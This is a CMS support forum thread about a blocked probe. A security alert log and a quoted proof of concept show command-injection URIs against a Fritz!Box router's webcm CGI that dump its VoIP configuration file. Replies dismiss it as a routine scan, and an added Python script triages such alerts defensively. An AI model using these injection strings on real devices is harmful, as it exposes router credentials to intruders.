Elxis CMS Forum
Support => Security => Topic started by: timalsina on September 08, 2014, 23:40:17
-
I received this email. Any clue what could have been the intention here:
Elxis Defender blocked an attack to your site!
Reference code: SEC-DEFG-0130
Elxis Defender report
Signatures: general
Match method: inmatch
Haystack: requesturi
Pattern match: ..
Reason: Directory traversal attack.
Requested URI: //cgi-bin/webcm?getpage=../html/menus/menu2.html&var:lang=& allcfgconv -C voip -c -o - ../../../../../var/tmp/voip.cfg &
IP address: 195.154.183.174
Hostname: 195-154-183-174.rev.poneytelecom.eu
User agent: curl/7.19.7 (x86_64-redhat-linux-gnu) libcurl/7.19.7 NSS/3.14.0.0 zlib/1.2.3 libidn/1.18 libssh2/1.4.2
Date (UTC): 2014-09-07 18:39:27
Site URL: http://www.sitedomain.com
-
This is what I've found so far. Source: http://www.exploit-id.com/author/admin/page/9
App : Fritz!Box
Author : 0x4148
Fritz!Box is a networking/Voice over IP router produced by AVM. It suffers from an unauthenticated remote command execution flaw.
Poc : https://ip/cgi-bin/webcm?getpage=../html/menus/menu2.html&var:lang=%26%20cat%20/var/flash/voip.cfg%20%26
#0x4148_rise
-
Looks like a random scan for known exploits. Nothing to worry about. I receive dozens of similar alerts daily.
-
Me too! Don't worry... It's a routine!
-
Is there a way to switch off these alerts by email?
-
From backend - [top menu] Site - Settings - [tab] Errors - [Option] Alert switch to No
-
Thanks!
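-
Added example, not part of the original thread and not Elxis code: a small triage script that parses a Defender alert like the one in the first post and summarises why it reads as a scan for another product's flaw. The `served_prefixes` parameter and the `/index.php` value passed to it are assumptions standing in for the paths your own site actually serves.

```python
import re
from urllib.parse import unquote

# Alert text taken from the first post of this thread (some fields left out).
SAMPLE_ALERT = """\
Reference code: SEC-DEFG-0130
Signatures: general
Match method: inmatch
Haystack: requesturi
Pattern match: ..
Reason: Directory traversal attack.
Requested URI: //cgi-bin/webcm?getpage=../html/menus/menu2.html&var:lang=& allcfgconv -C voip -c -o - ../../../../../var/tmp/voip.cfg &
"""

def parse_alert(text):
    """Split the 'Field: value' lines of a Defender report into a dict."""
    fields = {}
    for line in text.splitlines():
        key, sep, value = line.partition(": ")
        if sep:
            fields[key.strip().lower()] = value.strip()
    return fields

def triage(fields, served_prefixes):
    """Summarise the request. served_prefixes (hypothetical parameter) lists
    the path prefixes this site really serves, supplied by the site owner."""
    uri = unquote(fields.get("requested uri", ""))  # handles %26%20 forms too
    path, _, query = uri.partition("?")
    # Collapse repeated slashes by hand: URL parsers such as
    # urllib.parse.urlsplit would read "//cgi-bin/webcm" as host "cgi-bin".
    path = re.sub(r"/+", "/", path)
    served = any(path.startswith(p) for p in served_prefixes)
    return {
        "path": path,
        # Number of "../" (or "..\") steps, the pattern Defender matched on.
        "traversal_steps": len(re.findall(r"\.\.[\\/]", uri)),
        # A shell separator followed by whitespace and a word suggests an
        # appended command rather than an ordinary query parameter.
        "shell_separator": bool(re.search(r"[&;|`]\s+\w+", query)),
        "path_served_here": served,
        "verdict": ("request hit a path this site serves: review it"
                    if served else "probe for software this site does not run"),
    }

if __name__ == "__main__":
    report = triage(parse_alert(SAMPLE_ALERT), ("/index.php",))
    for name, value in report.items():
        print(f"{name}: {value}")
```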